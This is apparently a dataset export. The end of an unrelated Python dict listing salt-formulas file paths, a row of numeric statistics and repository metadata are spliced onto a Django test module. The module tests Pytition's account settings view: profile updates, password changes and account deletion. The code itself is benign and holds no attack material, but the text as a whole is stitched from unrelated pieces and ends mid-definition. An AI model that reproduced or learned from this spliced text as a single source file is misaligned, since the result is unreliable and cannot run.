'/mnt/data/home/mdupont/experiments/salt-formulas/wcannon_saltstack-related/_modules/wc_ec2_metadata': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/wendall911_wendall911-salt-states/salt/_grains/ip_addr': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/westurner_apt-cacher-ng-formula/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/westurner_cookiecutter-saltformula/{{cookiecutter.repo_name}}/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/westurner_dotfiles-formula/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/westurner_heka-formula/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/westurner_htop-formula/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/westurner_i3wm-formula/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/westurner_ipython-formula/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/westurner_mercurial-formula/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/westurner_packer-formula/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/westurner_python-formula/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/westurner_repos-formula/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/westurner_shinken-formula/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/westurner_shorewall-formula/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/westurner_supervisord-formula/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/westurner_tortoisehg-formula/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/westurner_ufw-formula/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/westurner_vagrant-formula/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/westurner_virtualbox-formula/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/westurner_wajig-formula/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/westurner_winswitch-formula/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/worstadmin_salt-module-tcplisten/tcplisten': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/worstadmin_salt-module-tcplisten/test': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/wunki_django-salted/demo_project/demo_project': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/wunki_django-salted/demo_project/demo_project/demo': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/wunki_django-salted/demo_project/demo_project/demo/models': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/wunki_django-salted/demo_project/demo_project/demo/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/wunki_django-salted/demo_project/demo_project/demo/views': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/wunki_django-salted/demo_project/demo_project/settings': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/wunki_django-salted/demo_project/manage': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/_grains/ipmi': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/_outputter/ipmiviewer': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/_outputter/xencenter': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/_retunner/check_mk': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/_retunner/local_test': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/cmk/server/wato/cmdb/conf.d/cs_apis': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/nagios/import_cloudstack_vm/CloudStack': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/nagios/import_cloudstack_vm/CloudStack/BaseClient': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/nagios/nagios02/import_cloudstack_vm/CloudStack': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/nagios/nagios02/import_cloudstack_vm/CloudStack/BaseClient': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/pxe/ERPXE/files/ks/pub-scripts/xs602-constants-100G': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/pxe/SYSLINUX': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/pxe/SYSLINUX/label': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/pxe/XenServer/installer/constants': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/pxe/XenServer/installer/cpiofile': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/pxe/XenServer/installer/init_constants': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/pxe/XenServer/installer/version': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/pxe/webpy-app/simple-todo-read-only/config': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/pxe/webpy-app/simple-todo-read-only/config/url': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/pxe/webpy-app/simple-todo-read-only/controllers': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/python/argparse-1.2.1/argparse': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/python/argparse-1.2.1/build/lib/argparse': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/python/argparse-1.2.1/doc/source/conf': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/python/argparse-1.2.1/test/test_argparse': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/racktables/read_conf': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/salt/master/extmods/modules/hwinfo': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/salt/master/extmods/modules/swinfo': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/salt/master/extmods/outputter/check_mk': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/service/ganglia/ganglia_rpm_build/ganglia-3.5.0/contrib/check_ganglia': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/service/ganglia/ganglia_rpm_build/ganglia-3.5.0/gmetad-python/Gmetad': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/service/ganglia/ganglia_rpm_build/ganglia-3.5.0/gmetad-python/Gmetad/gmetad_config': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/service/ganglia/ganglia_rpm_build/ganglia-3.5.0/gmetad-python/Gmetad/gmetad_element': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/service/ganglia/ganglia_rpm_build/ganglia-3.5.0/gmetad-python/Gmetad/gmetad_random': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/service/ganglia/ganglia_rpm_build/ganglia-3.5.0/gmetad-python/gmetad_consistency_test': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/service/ganglia/ganglia_rpm_build/ganglia-3.5.0/gmond/python_modules/apache_status/apache_status': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/service/ganglia/ganglia_rpm_build/ganglia-3.5.0/gmond/python_modules/db/DBUtil': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/service/ganglia/ganglia_rpm_build/ganglia-3.5.0/gmond/python_modules/db/redis': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/service/ganglia/ganglia_rpm_build/ganglia-3.5.0/gmond/python_modules/db/riak': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/service/ganglia/ganglia_rpm_build/ganglia-3.5.0/gmond/python_modules/disk/diskfree': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/service/ganglia/ganglia_rpm_build/ganglia-3.5.0/gmond/python_modules/example/example': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/service/ganglia/ganglia_rpm_build/ganglia-3.5.0/gmond/python_modules/example/spfexample': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/service/ganglia/ganglia_rpm_build/ganglia-3.5.0/gmond/python_modules/memcached/memcached': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/service/ganglia/ganglia_rpm_build/ganglia-3.5.0/gmond/python_modules/memory/mem_stats': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/service/ganglia/ganglia_rpm_build/ganglia-3.5.0/gmond/python_modules/network/multi_interface': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/service/ganglia/ganglia_rpm_build/ganglia-3.5.0/gmond/python_modules/network/netstats': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/service/ganglia/ganglia_rpm_build/ganglia-3.5.0/gmond/python_modules/network/tcpconn': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/service/ganglia/ganglia_rpm_build/ganglia-3.5.0/gmond/python_modules/network/traffic1': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/service/ganglia/ganglia_rpm_build/ganglia-3.5.0/gmond/python_modules/nfs/nfsstats': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/service/ganglia/ganglia_rpm_build/ganglia-3.5.0/gmond/python_modules/ssl/entropy': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/service/ganglia/ganglia_rpm_build/ganglia-3.5.0/gmond/python_modules/varnish/varnish': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/service/ganglia/ganglia_rpm_build/ganglia-3.5.0/gmond/python_modules/vm_stats/vm_stats': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/squid/etc/python2.6/sitecustomize': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/y0j_salt-configs/dev/django/settings': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/yesimon_salt-states/_states/brew_cask': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ythuang_salt/deploy/fabfile': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/yumike_pycon2013/salt/roots/salt/_states/nginx_site': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/yumike_pycon2013/salt/roots/salt/helloworld/app': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/yyf1986_saltstack/salt/_grains/ihs': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/yyf1986_saltstack/salt/_grains/info': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/yyf1986_saltstack/salt/_grains/varnish': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/yyf1986_saltstack/salt/_grains/was': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/yyf1986_saltstack/salt/_grains/zabbix': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/yyf1986_saltstack/salt/_modules/ihs': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/yyf1986_saltstack/salt/_modules/jboss': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/yyf1986_saltstack/salt/_modules/was': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/yyf1986_saltstack/tools/event/log': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/zen4ever_salty-wsgi/docs/conf': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/zignig_mini_master/salt/master/files/eventlisten': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/zignig_substrate_salt/salt/files/scripts/full_replica': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/zombiemonkey_ebi/ebi': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/zombiemonkey_ebi/ebi/config': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/zombiemonkey_ebi/ebi/version': 1} | 105.631268 | 168 | 0.817308 | 15,046 | 107,427 | 5.720125 | 0.06726 | 0.177424 | 0.129983 | 0.2127 | 0.925463 | 0.925463 | 0.925463 | 0.924987 | 0.909859 | 0.874397 | 0 | 0.013077 | 0.028382 | 107,427 | 1,017 | 169 | 105.631268 | 0.811474 | 0 | 0 | 0 | 0 | 0.838741 | 0.924145 | 0.924145 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.001967 | 0.0059 | 0 | 0.0059 | 0.000983 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
e03e22a2604d48129ba1ea79fe3377d57ab0af80 | 39,963 | py | Python | pytition/petition/tests/tests_AccountSettingsView.py | Te-k/Pytition | 16ebce01b491b72ed387709d9b705f7cb0d5476f | [
"BSD-3-Clause"
] | null | null | null | pytition/petition/tests/tests_AccountSettingsView.py | Te-k/Pytition | 16ebce01b491b72ed387709d9b705f7cb0d5476f | [
"BSD-3-Clause"
] | null | null | null | pytition/petition/tests/tests_AccountSettingsView.py | Te-k/Pytition | 16ebce01b491b72ed387709d9b705f7cb0d5476f | [
"BSD-3-Clause"
] | null | null | null | from django.test import TestCase
from django.urls import reverse
from django.contrib.auth import get_user_model
from petition.models import Organization, Petition, PytitionUser
from petition.helpers import get_update_form
from petition.forms import DeleteAccountForm
# Fixture data shared by every test in this module.
# Usernames; setUpTestData creates each account with password == username.
users = ['julia', 'john', 'max', 'sarah']
# Organization names to create.
orgs = ['RAP', 'Greenpeace', 'Attac', 'Les Amis de la Terre']
# Number of *published* petitions owned by each user.
user_published_petitions = {
    'john': 0,
    'sarah': 0,
    'julia': 5,
    'max': 10
}
# Number of *unpublished* petitions owned by each user.
user_unpublished_petitions = {
    'john': 0,
    'sarah': 5,
    'julia': 0,
    'max': 10
}
# Number of *published* petitions owned by each organization.
org_published_petitions = {
    'RAP': 0,
    'Les Amis de la Terre': 0,
    'Greenpeace': 1,
    'Attac': 2
}
# Number of *unpublished* petitions owned by each organization.
org_unpublished_petitions = {
    'RAP': 0,
    'Les Amis de la Terre': 1,
    'Greenpeace': 0,
    'Attac': 2
}
# Organization membership: org name -> usernames added via Organization.add_member.
org_members = {
    'RAP': ['julia'],
    'Les Amis de la Terre': ['julia', 'max'],
    'Attac': ['john'],
}
class AccountSettingsViewTest(TestCase):
"""Test index view"""
    @classmethod
    def setUpTestData(cls):
        """Create the organizations, users, petitions and memberships once per class.

        Counts come from the module-level fixture dicts
        (user_/org_ published/unpublished petitions, org_members).
        """
        User = get_user_model()
        for org in orgs:
            o = Organization.objects.create(name=org)
            # Attach the configured number of published petitions to the org.
            for i in range(org_published_petitions[org]):
                p = Petition.objects.create(published=True)
                o.petitions.add(p)
                p.save()
            # ...and the unpublished ones.
            for i in range(org_unpublished_petitions[org]):
                p = Petition.objects.create(published=False)
                o.petitions.add(p)
                p.save()
            o.save()
        for user in users:
            # Password deliberately equals the username (see login()).
            u = User.objects.create_user(user, password=user)
            u.first_name = user
            u.last_name = user + "Last"
            u.save()
            # PytitionUser is created as a side effect of User creation —
            # presumably via a signal; fetch the profile rather than create it.
            pu = PytitionUser.objects.get(user__username=user)
            for i in range(user_published_petitions[user]):
                p = Petition.objects.create(published=True)
                pu.petitions.add(p)
                p.save()
            for i in range(user_unpublished_petitions[user]):
                p = Petition.objects.create(published=False)
                pu.petitions.add(p)
                p.save()
        for orgname in org_members:
            org = Organization.objects.get(name=orgname)
            for username in org_members[orgname]:
                user = PytitionUser.objects.get(user__username=username)
                org.add_member(user)
        # give julia can_modify_petitions permission on "Les Amis de la Terre" organization
        perm = PytitionUser.objects.get(user__username="julia").permissions\
            .get(organization__name="Les Amis de la Terre")
        perm.can_modify_petitions = True
        perm.save()
def login(self, name, password=None):
self.client.login(username=name, password=password if password else name)
self.pu = PytitionUser.objects.get(user__username=name)
return self.pu
    def logout(self):
        """Log the test client out of any authenticated session."""
        self.client.logout()
    def tearDown(self):
        """Per-test cleanup hook — nothing to do; TestCase rolls back the DB."""
        # Clean up run after every test method.
        pass
def test_NotLoggedIn(self):
self.logout()
response = self.client.get(reverse("account_settings"), follow=True)
self.assertRedirects(response, reverse("login")+"?next="+reverse("account_settings"))
self.assertTemplateUsed(response, "registration/login.html")
self.assertTemplateUsed(response, "layouts/base.html")
def test_UserOK1(self):
john = self.login("john")
update_info_form = get_update_form(john.user)
response = self.client.get(reverse("account_settings"))
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, "petition/account_settings.html")
self.assertTemplateUsed(response, "layouts/base.html")
self.assertEqual(response.context['user'], john)
self.assertEqual(response.context['update_info_form_submitted'], False)
self.assertEqual(response.context['delete_account_form_submitted'], False)
self.assertEqual(response.context['password_change_form_submitted'], False)
self.assertEqual(response.context['update_info_form'].is_valid(), True)
self.assertEqual(response.context['update_info_form'].is_bound, True)
self.assertEqual(response.context['delete_account_form'].is_valid(), False)
self.assertEqual(response.context['delete_account_form'].is_bound, False)
self.assertEqual(response.context['password_change_form'].is_valid(), False)
self.assertEqual(response.context['password_change_form'].is_bound, False)
def test_UserOK2(self):
julia = self.login("julia")
response = self.client.get(reverse("account_settings"))
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, "petition/account_settings.html")
self.assertTemplateUsed(response, "layouts/base.html")
self.assertEqual(response.context['user'], julia)
self.assertEqual(response.context['update_info_form_submitted'], False)
self.assertEqual(response.context['delete_account_form_submitted'], False)
self.assertEqual(response.context['password_change_form_submitted'], False)
self.assertEqual(response.context['update_info_form'].is_valid(), True)
self.assertEqual(response.context['update_info_form'].is_bound, True)
self.assertEqual(response.context['delete_account_form'].is_valid(), False)
self.assertEqual(response.context['delete_account_form'].is_bound, False)
self.assertEqual(response.context['password_change_form'].is_valid(), False)
self.assertEqual(response.context['password_change_form'].is_bound, False)
def test_UserOK3(self):
max = self.login("max")
response = self.client.get(reverse("account_settings"))
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, "petition/account_settings.html")
self.assertTemplateUsed(response, "layouts/base.html")
self.assertEqual(response.context['user'], max)
self.assertEqual(response.context['update_info_form_submitted'], False)
self.assertEqual(response.context['delete_account_form_submitted'], False)
self.assertEqual(response.context['password_change_form_submitted'], False)
self.assertEqual(response.context['update_info_form'].is_valid(), True)
self.assertEqual(response.context['update_info_form'].is_bound, True)
self.assertEqual(response.context['delete_account_form'].is_valid(), False)
self.assertEqual(response.context['delete_account_form'].is_bound, False)
self.assertEqual(response.context['password_change_form'].is_valid(), False)
self.assertEqual(response.context['password_change_form'].is_bound, False)
def test_UserOK4(self):
sarah = self.login("sarah")
response = self.client.get(reverse("account_settings"))
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, "petition/account_settings.html")
self.assertTemplateUsed(response, "layouts/base.html")
self.assertEqual(response.context['user'], sarah)
self.assertEqual(response.context['update_info_form_submitted'], False)
self.assertEqual(response.context['delete_account_form_submitted'], False)
self.assertEqual(response.context['password_change_form_submitted'], False)
self.assertEqual(response.context['update_info_form'].is_valid(), True)
self.assertEqual(response.context['update_info_form'].is_bound, True)
self.assertEqual(response.context['delete_account_form'].is_valid(), False)
self.assertEqual(response.context['delete_account_form'].is_bound, False)
self.assertEqual(response.context['password_change_form'].is_valid(), False)
self.assertEqual(response.context['password_change_form'].is_bound, False)
def test_UserjohnPOSTUserInfoOK(self):
john = self.login("john")
update_info_form = get_update_form(john.user)
update_info_form.is_valid()
data = update_info_form.cleaned_data
data.update({
'update_info_form_submitted': 'yes',
})
response = self.client.post(reverse("account_settings"), data)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, "petition/account_settings.html")
self.assertTemplateUsed(response, "layouts/base.html")
self.assertEqual(response.context['user'], john)
self.assertEqual(response.context['update_info_form_submitted'], True)
self.assertEqual(response.context['delete_account_form_submitted'], False)
self.assertEqual(response.context['password_change_form_submitted'], False)
self.assertEqual(response.context['update_info_form'].is_valid(), True)
self.assertEqual(response.context['update_info_form'].is_bound, True)
self.assertEqual(response.context['delete_account_form'].is_valid(), False)
self.assertEqual(response.context['delete_account_form'].is_bound, False)
self.assertEqual(response.context['password_change_form'].is_valid(), False)
self.assertEqual(response.context['password_change_form'].is_bound, False)
def test_UserjohnPOSTPassChangeOK(self):
john = self.login("john")
new_pass = 'eytksjezu375&#'
data = {
'password_change_form_submitted': 'yes',
'old_password': 'john',
'new_password1': new_pass,
'new_password2': new_pass,
}
response = self.client.post(reverse("account_settings"), data)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, "petition/account_settings.html")
self.assertTemplateUsed(response, "layouts/base.html")
self.assertEqual(response.context['user'], john)
self.assertEqual(response.context['update_info_form_submitted'], False)
self.assertEqual(response.context['delete_account_form_submitted'], False)
self.assertEqual(response.context['password_change_form_submitted'], True)
self.assertEqual(response.context['update_info_form'].is_valid(), True)
self.assertEqual(response.context['update_info_form'].is_bound, True)
self.assertEqual(response.context['delete_account_form'].is_valid(), False)
self.assertEqual(response.context['delete_account_form'].is_bound, False)
self.assertEqual(response.context['password_change_form'].is_valid(), True)
self.assertEqual(response.context['password_change_form'].is_bound, True)
self.logout()
self.login("john", password=new_pass)
response2 = self.client.get(reverse("user_dashboard"))
self.assertEqual(response2.status_code, 200)
self.logout()
self.login("john")
response3 = self.client.get(reverse("user_dashboard"), follow=True)
self.assertRedirects(response3, reverse("login")+"?next="+reverse("user_dashboard"))
def test_UserjohnPOSTDeleteAccountOK(self):
# to avoid 404 error when index page redirects to deleted Organization profile page
with self.settings(INDEX_PAGE="ALL_PETITIONS"):
self.login("john")
data = {
'validation': "DROP MY ACCOUNT",
'delete_account_form_submitted': "yes",
}
f = DeleteAccountForm(data)
self.assertEqual(f.is_valid(), True)
response = self.client.post(reverse("account_settings"), data, follow=True)
self.assertRedirects(response, reverse("all_petitions"))
self.assertTemplateUsed(response, "layouts/base.html")
self.logout()
try:
self.login("john")
response2 = self.client.get(reverse("user_dashboard"))
self.assertRedirects(response2, reverse("login")+"?next="+reverse("user_dashboard"))
self.assertEqual(0, 1) # Should never be reached
except:
pass # I expected that!
pu = PytitionUser.objects.filter(user__username="john").count()
self.assertEqual(pu, 0)
User = get_user_model()
u = User.objects.filter(username="john").count()
self.assertEqual(u, 0)
def test_UsersarahPOSTUserInfoOK(self):
username = "sarah"
user = self.login(username)
update_info_form = get_update_form(user.user)
update_info_form.is_valid()
data = update_info_form.cleaned_data
data.update({
'update_info_form_submitted': 'yes',
})
response = self.client.post(reverse("account_settings"), data)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, "petition/account_settings.html")
self.assertTemplateUsed(response, "layouts/base.html")
self.assertEqual(response.context['user'], user)
self.assertEqual(response.context['update_info_form_submitted'], True)
self.assertEqual(response.context['delete_account_form_submitted'], False)
self.assertEqual(response.context['password_change_form_submitted'], False)
self.assertEqual(response.context['update_info_form'].is_valid(), True)
self.assertEqual(response.context['update_info_form'].is_bound, True)
self.assertEqual(response.context['delete_account_form'].is_valid(), False)
self.assertEqual(response.context['delete_account_form'].is_bound, False)
self.assertEqual(response.context['password_change_form'].is_valid(), False)
self.assertEqual(response.context['password_change_form'].is_bound, False)
def test_UsersarahPOSTPassChangeOK(self):
username ="sarah"
user = self.login(username)
new_pass = 'eytksjezu375&#'
data = {
'password_change_form_submitted': 'yes',
'old_password': username,
'new_password1': new_pass,
'new_password2': new_pass,
}
response = self.client.post(reverse("account_settings"), data)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, "petition/account_settings.html")
self.assertTemplateUsed(response, "layouts/base.html")
self.assertEqual(response.context['user'], user)
self.assertEqual(response.context['update_info_form_submitted'], False)
self.assertEqual(response.context['delete_account_form_submitted'], False)
self.assertEqual(response.context['password_change_form_submitted'], True)
self.assertEqual(response.context['update_info_form'].is_valid(), True)
self.assertEqual(response.context['update_info_form'].is_bound, True)
self.assertEqual(response.context['delete_account_form'].is_valid(), False)
self.assertEqual(response.context['delete_account_form'].is_bound, False)
self.assertEqual(response.context['password_change_form'].is_valid(), True)
self.assertEqual(response.context['password_change_form'].is_bound, True)
self.logout()
self.login(username, password=new_pass)
response2 = self.client.get(reverse("user_dashboard"))
self.assertEqual(response2.status_code, 200)
self.logout()
self.login(username)
response3 = self.client.get(reverse("user_dashboard"), follow=True)
self.assertRedirects(response3, reverse("login")+"?next="+reverse("user_dashboard"))
def test_UsersarahPOSTDeleteAccountOK(self):
# to avoid 404 error when index page redirects to deleted Organization profile page
with self.settings(INDEX_PAGE="ALL_PETITIONS"):
username = "sarah"
self.login(username)
data = {
'validation': "DROP MY ACCOUNT",
'delete_account_form_submitted': "yes",
}
f = DeleteAccountForm(data)
self.assertEqual(f.is_valid(), True)
response = self.client.post(reverse("account_settings"), data, follow=True)
self.assertRedirects(response, reverse("all_petitions"))
self.assertTemplateUsed(response, "layouts/base.html")
self.logout()
try:
self.login(username)
response2 = self.client.get(reverse("user_dashboard"))
self.assertRedirects(response2, reverse("login")+"?next="+reverse("user_dashboard"))
self.assertEqual(0, 1) # Should never be reached
except:
pass # I expected that!
pu = PytitionUser.objects.filter(user__username=username).count()
self.assertEqual(pu, 0)
User = get_user_model()
u = User.objects.filter(username=username).count()
self.assertEqual(u, 0)
def test_UserjuliaPOSTUserInfoOK(self):
username = "julia"
user = self.login(username)
update_info_form = get_update_form(user.user)
update_info_form.is_valid()
data = update_info_form.cleaned_data
data.update({
'update_info_form_submitted': 'yes',
})
response = self.client.post(reverse("account_settings"), data)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, "petition/account_settings.html")
self.assertTemplateUsed(response, "layouts/base.html")
self.assertEqual(response.context['user'], user)
self.assertEqual(response.context['update_info_form_submitted'], True)
self.assertEqual(response.context['delete_account_form_submitted'], False)
self.assertEqual(response.context['password_change_form_submitted'], False)
self.assertEqual(response.context['update_info_form'].is_valid(), True)
self.assertEqual(response.context['update_info_form'].is_bound, True)
self.assertEqual(response.context['delete_account_form'].is_valid(), False)
self.assertEqual(response.context['delete_account_form'].is_bound, False)
self.assertEqual(response.context['password_change_form'].is_valid(), False)
self.assertEqual(response.context['password_change_form'].is_bound, False)
def test_UserjuliaPOSTPassChangeOK(self):
username ="julia"
user = self.login(username)
new_pass = 'eytksjezu375&#'
data = {
'password_change_form_submitted': 'yes',
'old_password': username,
'new_password1': new_pass,
'new_password2': new_pass,
}
response = self.client.post(reverse("account_settings"), data)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, "petition/account_settings.html")
self.assertTemplateUsed(response, "layouts/base.html")
self.assertEqual(response.context['user'], user)
self.assertEqual(response.context['update_info_form_submitted'], False)
self.assertEqual(response.context['delete_account_form_submitted'], False)
self.assertEqual(response.context['password_change_form_submitted'], True)
self.assertEqual(response.context['update_info_form'].is_valid(), True)
self.assertEqual(response.context['update_info_form'].is_bound, True)
self.assertEqual(response.context['delete_account_form'].is_valid(), False)
self.assertEqual(response.context['delete_account_form'].is_bound, False)
self.assertEqual(response.context['password_change_form'].is_valid(), True)
self.assertEqual(response.context['password_change_form'].is_bound, True)
self.logout()
self.login(username, password=new_pass)
response2 = self.client.get(reverse("user_dashboard"))
self.assertEqual(response2.status_code, 200)
self.logout()
self.login(username)
response3 = self.client.get(reverse("user_dashboard"), follow=True)
self.assertRedirects(response3, reverse("login")+"?next="+reverse("user_dashboard"))
def test_UserjuliaPOSTDeleteAccountOK(self):
# to avoid 404 error when index page redirects to deleted Organization profile page
with self.settings(INDEX_PAGE="ALL_PETITIONS"):
username = "julia"
self.login(username)
data = {
'validation': "DROP MY ACCOUNT",
'delete_account_form_submitted': "yes",
}
f = DeleteAccountForm(data)
self.assertEqual(f.is_valid(), True)
response = self.client.post(reverse("account_settings"), data, follow=True)
self.assertRedirects(response, reverse("all_petitions"))
self.assertTemplateUsed(response, "layouts/base.html")
self.logout()
try:
self.login(username)
response2 = self.client.get(reverse("user_dashboard"))
self.assertRedirects(response2, reverse("login")+"?next="+reverse("user_dashboard"))
self.assertEqual(0, 1) # Should never be reached
except:
pass # I expected that!
pu = PytitionUser.objects.filter(user__username=username).count()
self.assertEqual(pu, 0)
User = get_user_model()
u = User.objects.filter(username=username).count()
self.assertEqual(u, 0)
def test_UsermaxPOSTUserInfoOK(self):
username = "max"
user = self.login(username)
update_info_form = get_update_form(user.user)
update_info_form.is_valid()
data = update_info_form.cleaned_data
data.update({
'update_info_form_submitted': 'yes',
})
response = self.client.post(reverse("account_settings"), data)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, "petition/account_settings.html")
self.assertTemplateUsed(response, "layouts/base.html")
self.assertEqual(response.context['user'], user)
self.assertEqual(response.context['update_info_form_submitted'], True)
self.assertEqual(response.context['delete_account_form_submitted'], False)
self.assertEqual(response.context['password_change_form_submitted'], False)
self.assertEqual(response.context['update_info_form'].is_valid(), True)
self.assertEqual(response.context['update_info_form'].is_bound, True)
self.assertEqual(response.context['delete_account_form'].is_valid(), False)
self.assertEqual(response.context['delete_account_form'].is_bound, False)
self.assertEqual(response.context['password_change_form'].is_valid(), False)
self.assertEqual(response.context['password_change_form'].is_bound, False)
    def test_UsermaxPOSTPassChangeOK(self):
        """A valid password change for 'max': the settings page re-renders with
        a bound, valid password-change form; afterwards the new password
        authenticates and the old one no longer grants dashboard access.
        """
